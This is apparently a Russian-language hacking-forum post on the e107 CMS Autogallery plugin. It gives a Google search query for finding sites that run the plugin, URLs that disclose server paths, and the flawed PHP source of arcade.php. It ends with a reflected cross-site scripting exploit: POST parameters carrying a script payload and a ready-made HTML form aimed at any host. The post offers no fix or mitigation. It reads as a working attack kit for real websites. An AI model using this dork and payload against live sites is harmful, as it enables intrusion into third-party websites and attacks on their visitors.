в гугле:
inurl:e107_plugins/autogallery
Результаты 1 - 10 из примерно 132 000

путь в информации!
http://e107/e107_plugins/autogallery/help.php

Цитата:

Z:\home\e107\www\e107_plugins\autogallery\Gallery

пути (бес параметров запрос послать!):
http://e107/e107_plugins/autogallery/xmlplaylist.php
http://e107/e107_plugins/autogallery/editaction.php

пассивная XSS
e107_plugins/autogallery/arcade.php

PHP код:

....
// Do different things when the flash game gives different requests
$sessdo = $_POST['sessdo'];

if ($sessdo != '') 
{ 
    // Session start to get the game name - $title
    $microone = $_POST['microone'];
    $score = $_POST['score'];
    $gametime = $_POST['gametime'];
    
    // Keep feeding that flash!
    switch($sessdo) 
    { 
        case 'sessionstart': 
            // Give it some random crap it doesn't really need (the initbar figure and lastid)
            echo "&connStatus=1&gametime=$gametime&initbar=6Z4&lastid=6&val=x"; 
            exit; 
            break;
    
         // Give it permission for... no apparent reason
        case 'permrequest':
            // Notice $microone = $score;  -__VERY IMPORTANT__
            $microone = $score;
            echo "&validate=1&microone=$microone";
            exit;
            break; ... 


target:

Цитата:

http://[host]/[path]/e107_plugins/autogallery/arcade.php

Result (шлем POST!):
sessdo=sessionstart
gametime=<script>alert(/XSS/)</script>
или
sessdo=permrequest
microone=<script>alert(/XSS/)</script>

<form action="http://[host]/[path]/e107_plugins/autogallery/arcade.php" method="POST">
<input type=text name=sessdo value=sessionstart><br>
<input type=text name=gametime value='<script>alert(/XSS/)</script>'><br>
<input type=submit value=Отправить>
</form>